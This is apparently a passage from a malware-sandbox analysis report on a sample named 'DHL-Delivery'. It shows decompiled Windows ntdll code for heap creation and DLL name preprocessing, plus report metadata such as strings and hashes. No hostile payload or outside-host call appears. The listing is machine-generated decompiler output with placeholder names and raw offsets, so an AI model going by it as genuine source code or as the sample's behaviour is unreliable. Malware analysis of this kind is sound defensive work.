                        																			E1E199503(0,  *(_t733 - 0xac), _t729, _t710, __eflags,  *(_t733 - 0xc0),  *(_t733 - 0xc8),  *_t710 & 0x000000ff);
                        																		}
                        																		if(E1E0F5440() != 0) {
                        																			_t524 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        																		} else {
                        																			_t524 = 0x7ffe0388;
                        																		}
                        																		if( *_t524 != 0) {
                        																			E1E197CE5(0,  *(_t733 - 0xac),  *(_t733 - 0xc0), _t729);
                        																		}
                        																		 *( *(_t733 - 0xac) + 0x48) =  *( *(_t733 - 0xac) + 0x48) & 0x7fffffff;
                        																		 *((intOrPtr*)( *(_t733 - 0xac) + 0xd0)) = 0;
                        																		_t721 =  *(_t733 - 0xac);
                        																		 *(_t733 - 0xac) = 0;
                        																		goto L81;
                        																	}
                        																} else {
                        																	 *((intOrPtr*)( *(_t733 - 0xac) + 0xec)) = E1E0F1F00(_t639,  *(_t733 - 0xac), 0x80000a, 0x100);
                        																	_t535 =  *((intOrPtr*)( *(_t733 - 0xac) + 0xec));
                        																	if(_t535 == 0) {
                        																		goto L167;
                        																	}
                        																	_t687 = 1;
                        																	 *((char*)(_t535 - 1)) = 1;
                        																	 *((short*)( *(_t733 - 0xac) + 0xf0)) = 0x80;
                        																	goto L69;
                        																}
                        															} else {
                        																 *(_t733 - 0xbc) = _t707;
                        																if(E1E106390(_t707, 0, 0x10000000) < 0) {
                        																	goto L137;
                        																}
                        																_t707 = _t707 + 0x18;
                        																goto L60;
                        															}
                        														}
                        														asm("sbb edi, edi");
                        														_push(( ~_t706 & 0x0000003c) + 4);
                        														_push(0x1000);
                        														_push(_t733 - 0xc8);
                        														_push(0);
                        														_push(_t733 - 0xcc);
                        														_push(0xffffffff);
                        														if(E1E120600() < 0) {
                        															goto L167;
                        														}
                        														if(E1E0F5440() != 0) {
                        															_t646 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        														} else {
                        															_t646 = 0x7ffe0380;
                        														}
                        														if( *_t646 != 0) {
                        															_t544 =  *[fs:0x30];
                        															__eflags =  *(_t544 + 0x240) & 0x00000001;
                        															if(( *(_t544 + 0x240) & 0x00000001) != 0) {
                        																E1E1993ED(0,  *(_t733 - 0xac),  *(_t733 - 0xcc),  *(_t733 - 0xc8), 1);
                        															}
                        														}
                        														 *(_t733 - 0xc4) =  *(_t733 - 0xc4) +  *(_t733 - 0xc8);
                        														_t682 =  *(_t733 - 0xac);
                        														goto L54;
                        													}
                        													_push(0);
                        													_push(0x1c);
                        													_push(_t733 - 0x110);
                        													_push(0);
                        													_push(_t701);
                        													_push(0xffffffff);
                        													_t547 = E1E1206D0();
                        													__eflags = _t547;
                        													if(_t547 < 0) {
                        														goto L168;
                        													}
                        													_t548 =  *(_t733 - 0x110);
                        													 *(_t733 - 0xc4) = _t548;
                        													__eflags = _t548 - _t701;
                        													if(_t548 != _t701) {
                        														goto L168;
                        													}
                        													__eflags =  *((intOrPtr*)(_t733 - 0x100)) - 0x10000;
                        													if( *((intOrPtr*)(_t733 - 0x100)) == 0x10000) {
                        														goto L168;
                        													}
                        													 *(_t733 - 0xcc) = _t548;
                        													__eflags =  *((intOrPtr*)(_t733 - 0x100)) - 0x1000;
                        													if( *((intOrPtr*)(_t733 - 0x100)) != 0x1000) {
                        														_t651 =  *(_t733 - 0x104);
                        														 *(_t733 - 0xc0) = _t651;
                        														_t549 =  *(_t733 - 0xc8);
                        														__eflags = _t549 - _t651;
                        														if(_t549 > _t651) {
                        															_t549 = _t651;
                        															 *(_t733 - 0xc8) = _t549;
                        														}
                        														__eflags = _t549 - 0x1000;
                        														if(_t549 < 0x1000) {
                        															goto L168;
                        														} else {
                        															goto L107;
                        														}
                        													}
                        													_t724 =  *(_t733 - 0xb0);
                        													__eflags = _t724 & 0x00040000;
                        													if((_t724 & 0x00040000) != 0) {
                        														__eflags =  *(_t733 - 0xfc) & 0x00000040;
                        														if(( *(_t733 - 0xfc) & 0x00000040) == 0) {
                        															goto L168;
                        														}
                        													}
                        													E1E1269F0(_t548, 0, 0x1000);
                        													_t736 = _t736 + 0xc;
                        													_push(0);
                        													_push(0x14);
                        													_push(_t733 - 0x124);
                        													_push(3);
                        													_push(_t701);
                        													_push(0xffffffff);
                        													_t552 = E1E1206D0();
                        													__eflags = _t552;
                        													if(_t552 < 0) {
                        														goto L168;
                        													}
                        													 *(_t733 - 0xc0) =  *(_t733 - 0x118);
                        													_t554 =  *(_t733 - 0x104);
                        													 *(_t733 - 0xc8) = _t554;
                        													_t555 =  *(_t733 - 0xcc) + _t554;
                        													__eflags = _t555;
                        													 *(_t733 - 0xc4) = _t555;
                        													goto L99;
                        												}
                        												 *(_t733 - 0xdc) = 0;
                        												 *(_t733 - 0xd4) = 0;
                        												if( *(_t733 - 0x84) != _t701) {
                        													_t721 = 0;
                        													_t413 =  *(_t733 - 0xbc);
                        													goto L83;
                        												}
                        												 *(_t733 - 0xe8) = E1E105C20(_t609);
                        												_t560 = (E1E105C20(_t609) & 0x0000001f) << 0x10;
                        												 *(_t733 - 0xd4) = _t560;
                        												_t652 =  *(_t733 - 0xc0);
                        												_t561 = _t560 + _t652;
                        												 *(_t733 - 0xe0) = _t561;
                        												if(_t561 < _t652) {
                        													 *(_t733 - 0xe0) = _t652;
                        													 *(_t733 - 0xd4) = 0;
                        												}
                        												_t724 =  *(_t733 - 0xb0);
                        												_t706 = _t724 & 0x00040000;
                        												asm("sbb eax, eax");
                        												_push(( ~_t706 & 0x0000003c) + 4);
                        												_push(0x2000);
                        												_push(_t733 - 0xe0);
                        												_push(0);
                        												_push(_t733 - 0xdc);
                        												_push(0xffffffff);
                        												if(E1E120600() < 0) {
                        													goto L167;
                        												} else {
                        													_t682 =  *(_t733 - 0xdc);
                        													 *(_t733 - 0xac) = _t682;
                        													 *(_t733 - 0xc0) =  *(_t733 - 0xe0);
                        													if( *(_t733 - 0xd4) != 0) {
                        														E1E1068B3(_t733 - 0xdc, _t733 - 0xd4, 0x8000);
                        														_t682 =  *(_t733 - 0xdc) +  *(_t733 - 0xd4);
                        														 *(_t733 - 0xac) = _t682;
                        														 *(_t733 - 0xc0) =  *(_t733 - 0xe0) -  *(_t733 - 0xd4);
                        													}
                        													_t439 = _t682;
                        													 *(_t733 - 0xcc) = _t439;
                        													_t611 = _t682;
                        													 *(_t733 - 0xc4) = _t611;
                        													goto L48;
                        												}
                        											}
                        											_t721 = 0;
                        											goto L82;
                        										}
                        										if(_t673 != 0) {
                        											_t436 = _t436 | 0x80000000;
                        											 *(_t733 - 0xb0) = _t436;
                        										}
                        										asm("sbb ecx, ecx");
                        										 *(_t733 - 0xbc) =  ~_t673 & _t673;
                        										asm("sbb ecx, ecx");
                        										_t609 = ( ~_t673 & 0xffffffe8) + 0x270;
                        										 *(_t733 - 0xd0) = ( ~_t673 & 0xffffffe8) + 0x270;
                        										goto L41;
                        									}
                        								}
                        							}
                        						}
                        						if( *0x1e1d17b0 >= 2) {
                        							__eflags = _t672 & 0xfff80c00;
                        							if((_t672 & 0xfff80c00) == 0) {
                        								goto L7;
                        							}
                        							_t583 =  *[fs:0x30];
                        							__eflags =  *(_t583 + 0xc);
                        							if( *(_t583 + 0xc) == 0) {
                        								_push("HEAP: ");
                        								E1E0DB1F0();
                        							} else {
                        								E1E0DB1F0("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        							}
                        							_push("!(CheckedFlags & ~HEAP_CREATE_VALID_MASK)");
                        							E1E0DB1F0();
                        							__eflags =  *0x1e1d0c68; // 0x0
                        							if(__eflags == 0) {
                        								_t666 = 2;
                        								E1E19A0D5(0, _t666, _t700, __eflags);
                        							}
                        							_t672 =  *(_t733 - 0xb0);
                        						}
                        						if((_t672 & 0xfff80c00) != 0) {
                        							 *(_t733 - 0xb0) = _t672 & 0x0007f3ff;
                        						}
                        						goto L7;
                        					}
                        					_t721 = _t700;
                        					_t592 = E1E19D2B4(_t700, _t672);
                        					__eflags = _t592;
                        					if(_t592 == 0) {
                        						goto L137;
                        					}
                        					_t672 =  *(_t733 - 0xb0);
                        					goto L3;
                        				}
                        				if(( *0x1e1d1788 & 0x00000001) != 0) {
                        					__eflags = _t672 & 0x00000002;
                        					if((_t672 & 0x00000002) == 0) {
                        						goto L3;
                        					}
                        					__eflags =  *(_t733 - 0xb8);
                        					if( *(_t733 - 0xb8) != 0) {
                        						goto L3;
                        					}
                        					__eflags = _t700;
                        					if(_t700 == 0) {
                        						L126:
                        						__eflags =  *(_t733 - 0xb4);
                        						if( *(_t733 - 0xb4) != 0) {
                        							goto L3;
                        						}
                        						goto L127;
                        					}
                        					_t593 = E1E19D299(_t700);
                        					__eflags = _t593;
                        					if(_t593 == 0) {
                        						goto L3;
                        					}
                        					goto L126;
                        				}
                        				goto L3;
                        			}

                        APIs
                        • RtlDebugPrintTimes.NTDLL ref: 1E14A9B4
                          • Part of subcall function 1E120600: LdrInitializeThunk.NTDLL ref: 1E12060A
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugInitializePrintThunkTimes
                        • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                        • API String ID: 3681346633-3570731704
                        • Opcode ID: 3d805a5c118a7377f82d947acbfd8d26026fdcca00b22c0dd13fc34d62a739a2
                        • Instruction ID: 1e9381bf2130094d6be075f7b791930d3154889cb962635eec2c3b1c15e16a0e
                        • Opcode Fuzzy Hash: 3d805a5c118a7377f82d947acbfd8d26026fdcca00b22c0dd13fc34d62a739a2
                        • Instruction Fuzzy Hash: 96824A75A01269CFEB24CF19C990B99B7B6BF44310F2682E9E849A7395D7309EC0CF51
                        Uniqueness

                        Uniqueness Score: 12.89%

                        C-Code - Quality: 96%
                        			E1E0EDF40(unsigned short __ecx, unsigned short __edx, signed int _a4, unsigned short _a8) {
                        				signed int _v8;
                        				char _v548;
                        				char _v549;
                        				char _v550;
                        				char _v551;
                        				char _v552;
                        				unsigned short _v556;
                        				signed int _v560;
                        				unsigned short _v564;
                        				signed int _v568;
                        				signed int _v570;
                        				signed int _v572;
                        				char* _v576;
                        				signed short _v580;
                        				intOrPtr _v584;
                        				intOrPtr _v586;
                        				char _v588;
                        				char _v592;
                        				intOrPtr _v596;
                        				intOrPtr _v600;
                        				char _v608;
                        				char _v616;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t130;
                        				char* _t131;
                        				signed int _t134;
                        				signed int _t136;
                        				signed short* _t158;
                        				short* _t162;
                        				signed short* _t165;
                        				unsigned int _t175;
                        				signed int _t179;
                        				intOrPtr* _t183;
                        				intOrPtr* _t184;
                        				intOrPtr* _t188;
                        				char* _t189;
                        				char _t198;
                        				intOrPtr _t204;
                        				signed char* _t206;
                        				signed int _t213;
                        				short* _t214;
                        				signed int _t219;
                        				signed char* _t227;
                        				unsigned short _t233;
                        				signed int _t239;
                        				intOrPtr _t240;
                        				unsigned short _t249;
                        				void* _t252;
                        				intOrPtr _t255;
                        				intOrPtr _t261;
                        				signed int _t266;
                        				signed int _t267;
                        				signed int _t269;
                        				signed short* _t270;
                        				unsigned short _t272;
                        				intOrPtr _t273;
                        				signed int _t274;
                        				void* _t275;
                        
                        				_t234 = __ecx;
                        				_v8 =  *0x1e1d6360 ^ _t274;
                        				_t266 = _a4;
                        				_t233 = __edx;
                        				_v564 = _a8;
                        				_v556 = __ecx;
                        				if(E1E0EF780(0,  &_v592) < 0) {
                        					_v552 = 0;
                        				} else {
                        					_v552 = 1;
                        				}
                        				_t254 = _v564;
                        				_t130 = 0;
                        				_t269 = 0;
                        				_v549 = 0;
                        				if(( *_t254 & 0x00800008) != 0) {
                        					L23:
                        					_t267 = _v556;
                        					_v560 = _t267;
                        					if( *_t233 != 0) {
                        						if(( *0x1e1ce7b0 & 0x00000005) != 0) {
                        							_t131 = "SxS";
                        							if(_t130 == 0) {
                        								_t131 = "API set";
                        							}
                        							_push(_t131);
                        							_push(_t233);
                        							E1E15BDA0("minkernel\\ntdll\\ldrutil.c", 0xa78, "LdrpPreprocessDllName", 2, "DLL %wZ was redirected to %wZ by %s\n", _t267);
                        							_t254 = _v564;
                        							_t275 = _t275 + 0x20;
                        						}
                        						_t134 =  *_t254 | 0x00000200;
                        						 *_t254 = _t134;
                        						if(_v549 != 0) {
                        							 *_t254 = _t134 | 0x00000004;
                        						}
                        						_t136 = _t233;
                        						_v560 = _t136;
                        						L34:
                        						if(_t269 < 0) {
                        							goto L110;
                        						}
                        						if(( *_t254 & 0x00000200) != 0) {
                        							_v580 = 0x2140000;
                        							_v576 =  &_v548;
                        							E1E0ED940(_t234,  &_v580, E1E0ED3A0());
                        							_t267 = _v580 & 0x0000ffff;
                        							E1E0ED940(_t234,  &_v580, L"\\SysWOW64");
                        							if(E1E0E5370(_t234,  &_v580, _t233, 1) != 0) {
                        								_v588 =  *_t233;
                        								_v588 = _v588 - _t267;
                        								_v586 = _v586 - _t267;
                        								_v584 =  *((intOrPtr*)(_t233 + 4)) + (_t267 >> 1) * 2;
                        								E1E0E2EA0( &_v588, 0x14c, 1, 0);
                        							}
                        							_t136 = _v560;
                        						}
                        						_t254 =  *(_t136 + 4);
                        						_t158 = ( *_t136 & 0x0000ffff) + 0xfffffffe + _t254;
                        						if(_t158 < _t254) {
                        							L42:
                        							_t254 = 0x1e0b10e8;
                        							_t269 = E1E0EDEE0(_t233, 0x1e0b10e8);
                        							goto L47;
                        						} else {
                        							while(1) {
                        								_t239 =  *_t158 & 0x0000ffff;
                        								if(_t239 == 0x2e) {
                        									break;
                        								}
                        								if(_t239 != 0x5c && _t239 != 0x2f) {
                        									_t158 = _t158 - 2;
                        									if(_t158 >= _t254) {
                        										continue;
                        									}
                        								}
                        								goto L42;
                        							}
                        							_t240 =  *((intOrPtr*)(_t233 + 4));
                        							_t162 = ( *_t233 & 0x0000ffff) + 0xfffffffe + _t240;
                        							if(_t162 < _t240) {
                        								L46:
                        								 *((short*)(_t162 + 2)) = 0;
                        								L47:
                        								if(_t269 < 0) {
                        									goto L110;
                        								}
                        								goto L48;
                        							} else {
                        								while( *_t162 == 0x2e) {
                        									_t254 = 0xfffe;
                        									_t162 = _t162 - 2;
                        									 *_t233 =  *_t233 + 0xfffe;
                        									if(_t162 >= _t240) {
                        										continue;
                        									}
                        									goto L46;
                        								}
                        								goto L46;
                        							}
                        						}
                        					}
                        					_t255 =  *((intOrPtr*)(_t267 + 4));
                        					_t165 = ( *_t267 & 0x0000ffff) + 0xfffffffe + _t255;
                        					if(_t165 < _t255) {
                        						L29:
                        						_t254 = _v564;
                        						_t269 = 0;
                        						 *_t254 =  *_t254 | 0x00000020;
                        						_t166 =  *_t267 & 0x0000ffff;
                        						if(( *_t267 & 0x0000ffff) == 0) {
                        							goto L33;
                        						} else {
                        							_t234 = _t233;
                        							_t269 = E1E0ED37F(_t233, _t166 + 2 + ( *_t233 & 0x0000ffff));
                        							if(_t269 >= 0) {
                        								E1E126370(( *_t233 & 0x0000ffff) +  *((intOrPtr*)(_t233 + 4)),  *((intOrPtr*)(_t267 + 4)),  *_t267 & 0x0000ffff);
                        								_t275 = _t275 + 0xc;
                        								_t175 =  *_t233 +  *_t267 & 0x0000ffff;
                        								 *_t233 = _t175;
                        								_t234 = _t175 >> 1;
                        								 *((short*)( *((intOrPtr*)(_t233 + 4)) + (_t175 >> 1) * 2)) = 0;
                        							}
                        							goto L32;
                        						}
                        					} else {
                        						while(1) {
                        							_t234 =  *_t165 & 0x0000ffff;
                        							if(_t234 == 0x5c || _t234 == 0x2f) {
                        								break;
                        							}
                        							_t165 = _t165 - 2;
                        							if(_t165 >= _t255) {
                        								continue;
                        							}
                        							goto L29;
                        						}
                        						if(E1E0E2CD1(_t267) == 5) {
                        							_t234 = _t233;
                        							_t269 = E1E0EDEE0(_t233, _t267);
                        							L32:
                        							_t254 = _v564;
                        							L33:
                        							_t136 = _t267;
                        							goto L34;
                        						}
                        						_t234 = _t267;
                        						_t179 = E1E0E596D(_t267, _t233);
                        						_t254 = _v564;
                        						_t269 = _t179;
                        						_t136 = _t267;
                        						if(_t269 < 0) {
                        							goto L110;
                        						}
                        						 *_t254 =  *_t254 | 0x00000600;
                        						goto L34;
                        					}
                        				} else {
                        					_t261 =  *[fs:0x30];
                        					_t12 = _t266 + 0x2c; // 0x1e1b8a94
                        					_t270 = _v556;
                        					_t234 = 0;
                        					_v560 = _t270;
                        					_v600 = _t261;
                        					asm("sbb edi, edi");
                        					_v549 = 0;
                        					_t267 =  ~_t266 & _t12;
                        					_v551 = 1;
                        					_v596 =  *((intOrPtr*)(_t261 + 0x38));
                        					_t183 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        					if(_t183 != 0) {
                        						if( *_t183 == 0) {
                        							goto L4;
                        						}
                        						_t184 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        						L5:
                        						if( *_t184 != _t234) {
                        							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                        								if(E1E0F5440() == 0) {
                        									_t227 = 0x7ffe0385;
                        								} else {
                        									_t227 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        								}
                        								if(( *_t227 & 0x00000020) != 0) {
                        									_t234 = 0x14d0;
                        									E1E15D913(0x14d0, 0, 0, 0, _t270, 0);
                        								}
                        							}
                        						}
                        						_t254 =  *_t270 & 0x0000ffff;
                        						_v572 = 0;
                        						_v568 = 0;
                        						_v550 = 0;
                        						if(_t254 < 8) {
                        							L12:
                        							_t188 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        							if(_t188 != 0) {
                        								if( *_t188 == 0) {
                        									goto L13;
                        								}
                        								_t189 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        								L14:
                        								if( *_t189 != 0) {
                        									if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                        										if(E1E0F5440() == 0) {
                        											_t206 = 0x7ffe0385;
                        										} else {
                        											_t206 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        										}
                        										if(( *_t206 & 0x00000020) != 0) {
                        											_t254 = 0;
                        											_t234 = 0x14d3;
                        											E1E15D913(0x14d3, 0, 0, 0, _t270, 0);
                        										}
                        									}
                        								}
                        								goto L15;
                        							}
                        							L13:
                        							_t189 = 0x7ffe0384;
                        							goto L14;
                        						} else {
                        							_t272 = _t270[2];
                        							_t234 =  *_t272 & 0xffdfffdf;
                        							_t213 =  *(_t272 + 4) & 0xffffffdf;
                        							if(_t234 != 0x500041 || _t213 != 0x2d0049) {
                        								if(_t234 != 0x580045 || _t213 != 0x2d0054) {
                        									goto L11;
                        								} else {
                        									goto L56;
                        								}
                        							} else {
                        								L56:
                        								_t249 = _t254;
                        								_t214 = _t249 + _t272;
                        								if(_t249 <= 1) {
                        									L59:
                        									_t234 = _t249 >> 1;
                        									_t215 = _t249 >> 0x00000001 & 0x0000ffff;
                        									if((_t249 >> 0x00000001 & 0x0000ffff) == 0) {
                        										L11:
                        										_t270 = _v556;
                        										goto L12;
                        									}
                        									_t254 = _t272;
                        									_t273 = _v596;
                        									_t234 = E1E0FA310(_t273, _t272, _t215);
                        									if(_t234 == 0) {
                        										goto L11;
                        									}
                        									if(_t267 == 0 ||  *((intOrPtr*)(_t234 + 0x14)) <= 1) {
                        										if( *((intOrPtr*)(_t234 + 0x14)) <= 0) {
                        											goto L11;
                        										}
                        										_t252 =  *((intOrPtr*)(_t234 + 0x10)) + _t273;
                        										goto L65;
                        									} else {
                        										_t89 = _t267 + 4; // 0x0
                        										_t252 = E1E0EDBAA(_t234,  *_t89,  *_t267 >> 0x00000001 & 0x0000ffff, _t273);
                        										L65:
                        										_t254 = _v556;
                        										_v568 =  *((intOrPtr*)(_t252 + 0xc)) + _t273;
                        										_t219 =  *(_t252 + 0x10) & 0x0000ffff;
                        										_t234 = 0;
                        										_v570 = _t219;
                        										_v572 = _t219;
                        										_v550 = 1;
                        										if(_t219 == 0) {
                        											E1E0ED906(0, _t254, 0x14d2);
                        											L93:
                        											_t269 = 0xc0000481;
                        											L21:
                        											if(_t269 < 0) {
                        												L110:
                        												if(( *0x1e1ce7b0 & 0x00000003) != 0) {
                        													_push(_t269);
                        													E1E15BDA0("minkernel\\ntdll\\ldrutil.c", 0xab2, "LdrpPreprocessDllName", 0, "LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx\n", _v556);
                        												}
                        												if(( *0x1e1ce7b0 & 0x00000010) != 0) {
                        													asm("int3");
                        												}
                        												L48:
                        												if(_v552 != 0) {
                        													E1E0EF780(_v592,  &_v592);
                        												}
                        												return E1E1225C0(_t269, _t233, _v8 ^ _t274, _t254, _t267, _t269);
                        											} else {
                        												_t130 = _v549;
                        												_t254 = _v564;
                        												goto L23;
                        											}
                        										}
                        										E1E0ED906(0, _t254, 0x14d1);
                        										L15:
                        										if(_v550 != 0) {
                        											if(_v572 == 0) {
                        												goto L93;
                        											}
                        											 *_t233 = 0;
                        											E1E122AC0(_t234,  &_v616, E1E0ED3A0());
                        											E1E0EDEE0(_t233,  &_v616);
                        											E1E0EDEE0(_t233, 0x1e0b122c);
                        											_t254 =  &_v572;
                        											_t269 = E1E0EDEE0(_t233,  &_v572);
                        											if(_t269 < 0) {
                        												_t198 = _v551;
                        												_t234 = _v560;
                        											} else {
                        												_t204 =  *((intOrPtr*)(_v600 + 0x10));
                        												if(_t204 == 0 || ( *(_t204 + 8) & 0x00001000) == 0) {
                        													_t198 = 0;
                        												} else {
                        													_t198 = 1;
                        												}
                        												_t234 = _t233;
                        											}
                        											if(_t269 >= 0) {
                        												goto L17;
                        											} else {
                        												goto L110;
                        											}
                        										} else {
                        											_t198 = _v551;
                        											_t234 = _v560;
                        											L17:
                        											if(_t198 != 0 &&  *0x1e1d0c1c == 0) {
                        												_t267 = E1E0EFD60(1, _t234, 0x1e0b10e8, 0,  &_v608, 0, 0, 0, 0);
                        												if(_t267 >= 0) {
                        													_t254 = _t233;
                        													_v549 = 1;
                        													E1E0E596D( &_v608, _t233);
                        													_t234 =  &_v608;
                        													E1E0E36A5( &_v608);
                        												}
                        												if(_t267 != 0xc0150008) {
                        													_t269 = _t267;
                        												}
                        											}
                        											goto L21;
                        										}
                        									}
                        								} else {
                        									goto L57;
                        								}
                        								do {
                        									L57:
                        									_t214 = _t214 - 2;
                        									_t249 = _t249 - 2;
                        								} while ( *_t214 != 0x2d && _t249 > 1);
                        								goto L59;
                        							}
                        						}
                        					}
                        					L4:
                        					_t184 = 0x7ffe0384;
                        					goto L5;
                        				}
                        			}


                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$\SysWOW64$minkernel\ntdll\ldrutil.c
                        • API String ID: 0-1558337705
                        • Opcode ID: 63b3d636637f3b1129ba545f54c3a0a5293fcdc560e5bfb52e5883e7afc58d87
                        • Instruction ID: 2c2c0b2fde048535aed22a8da2d0223e3164739c352d15460de89fbe352e5bf6
                        • Opcode Fuzzy Hash: 63b3d636637f3b1129ba545f54c3a0a5293fcdc560e5bfb52e5883e7afc58d87
                        • Instruction Fuzzy Hash: 3902F235A002A99FCB20CB64CC98BA977F2EF49700F1447F9E849ABA94D7749DC1CB51
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 96%
                        			E1E0EFD60(signed char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20, signed int _a24, intOrPtr* _a28, short _a32, intOrPtr* _a36) {
                        				signed int _v8;
                        				char _v140;
                        				short _v172;
                        				char _v176;
                        				signed int _v180;
                        				intOrPtr _v184;
                        				intOrPtr _v188;
                        				char _v192;
                        				signed int _v196;
                        				signed int _v200;
                        				short* _v204;
                        				short* _v208;
                        				short* _v212;
                        				signed int _v214;
                        				char _v216;
                        				short _v224;
                        				short _v228;
                        				short* _v232;
                        				signed short* _v236;
                        				signed short* _v240;
                        				short _v242;
                        				char _v244;
                        				intOrPtr _v248;
                        				char _v252;
                        				intOrPtr _v256;
                        				char _v260;
                        				char* _v280;
                        				char _v284;
                        				char _v288;
                        				char _v292;
                        				signed int _v296;
                        				void* _v300;
                        				signed int _v304;
                        				void* _v312;
                        				signed int _v316;
                        				signed short _v320;
                        				char _v324;
                        				signed short _v328;
                        				signed short* _v332;
                        				signed int _v336;
                        				void* _v337;
                        				void* _v342;
                        				void* _v344;
                        				void* _v348;
                        				void* _v352;
                        				void* _v353;
                        				void* _v356;
                        				void* _v364;
                        				void* _v366;
                        				void* _v368;
                        				void* _v369;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t178;
                        				signed short* _t179;
                        				intOrPtr _t181;
                        				intOrPtr _t185;
                        				short* _t186;
                        				intOrPtr _t192;
                        				short* _t193;
                        				short* _t203;
                        				signed int _t225;
                        				signed int _t226;
                        				signed int _t227;
                        				intOrPtr* _t234;
                        				intOrPtr* _t247;
                        				void* _t248;
                        				signed short* _t249;
                        				intOrPtr _t250;
                        				signed short* _t251;
                        				signed int _t252;
                        				intOrPtr* _t253;
                        				char* _t254;
                        				intOrPtr* _t260;
                        				short* _t261;
                        				signed short* _t264;
                        				signed int _t267;
                        				intOrPtr* _t269;
                        				void* _t270;
                        				intOrPtr* _t271;
                        				void* _t276;
                        				void* _t277;
                        				signed int _t278;
                        				void* _t280;
                        				signed int _t282;
                        				signed int _t284;
                        
                        				_t284 = (_t282 & 0xfffffff8) - 0x154;
                        				_v8 =  *0x1e1d6360 ^ _t284;
                        				_t253 = _a28;
                        				_t263 = _a32;
                        				_t178 = _a36;
                        				_t247 = _a8;
                        				_v296 = _t253;
                        				_v324 = 0;
                        				_v320 = 0;
                        				_v280 =  &_v140;
                        				_v300 = _t263;
                        				_v284 = 0x800000;
                        				_v288 = 0;
                        				_v328 = 0;
                        				_v304 = 0;
                        				_t269 = _a20;
                        				if(_t253 != 0) {
                        					 *_t253 = 0;
                        				}
                        				if(_t263 != 0) {
                        					 *_t263 = 0;
                        				}
                        				if(_t178 != 0) {
                        					 *_t178 = 0x208;
                        				}
                        				if(_t269 != 0) {
                        					 *_t269 = 0;
                        					 *((short*)(_t269 + 2)) = 0;
                        					 *((intOrPtr*)(_t269 + 4)) = 0;
                        				}
                        				_t179 =  &_v172;
                        				_v228 = 0x20;
                        				_v236 = _t179;
                        				_v232 = _t179;
                        				_v240 = _t179;
                        				_v172 = 0;
                        				_t181 = _a16;
                        				_v224 = 0x20;
                        				_v244 = 0x200000;
                        				if(_t181 == 0) {
                        					_t254 =  &_v192;
                        					_v200 = 2;
                        					_v208 = _t254;
                        					_v204 = _t254;
                        					_v212 = _t254;
                        					_v196 = 2;
                        					_v192 = 0;
                        					_v216 = 0x20000;
                        				} else {
                        					_t267 =  *(_t181 + 2) & 0x0000ffff;
                        					_t261 =  *((intOrPtr*)(_t181 + 4));
                        					if(_t267 < 2) {
                        						_t261 =  &_v192;
                        						_t267 = 2;
                        					}
                        					_v208 = _t261;
                        					_v200 = _t267;
                        					_v204 = _t261;
                        					_v196 = _t267;
                        					_v212 = _t261;
                        					if(_t261 != 0) {
                        						 *_t261 = 0;
                        					}
                        					_v214 = _t267;
                        					_t263 = _v300;
                        					_v216 = 0;
                        				}
                        				_t256 = _a24;
                        				_v188 = _t181;
                        				_v184 = _t269;
                        				_v180 = _t256;
                        				_v176 = 1;
                        				if((_a4 & 0xfffffffe) != 0) {
                        					_t276 = 0xc000000d;
                        					goto L82;
                        				} else {
                        					if(_t247 == 0) {
                        						_t276 = 0xc000000d;
                        						L82:
                        						if(_t276 >= 0) {
                        							L57:
                        							_t182 = _v320;
                        							if(_v320 != 0) {
                        								E1E0DB4F0(_t182);
                        								_v328 = 0;
                        								_v324 = 0;
                        							}
                        							_t185 = _v236;
                        							if(_t185 != 0) {
                        								if(_t185 != _v232) {
                        									_v248 = _t185;
                        									E1E0F6440( &_v252);
                        								}
                        								_v236 = _v232;
                        								_v228 = _v224;
                        							}
                        							_t186 = _v232;
                        							_v240 = _t186;
                        							if(_t186 != 0) {
                        								_t256 = 0;
                        								 *_t186 = 0;
                        							}
                        							_v244 = 0;
                        							_v242 = _v224;
                        							if(_t276 == 0xc0150001) {
                        								E1E17CF30(_t256, "Internal error check failed", "minkernel\\ntdll\\sxsisol.cpp", 0x1b2, "Status != STATUS_SXS_SECTION_NOT_FOUND");
                        								_t276 = 0xc00000e5;
                        								goto L82;
                        							} else {
                        								_pop(_t270);
                        								_pop(_t277);
                        								_pop(_t248);
                        								return E1E1225C0(_t276, _t248, _v8 ^ _t284, _t263, _t270, _t277);
                        							}
                        						}
                        						L51:
                        						if(_v176 != 0) {
                        							_t192 = _v208;
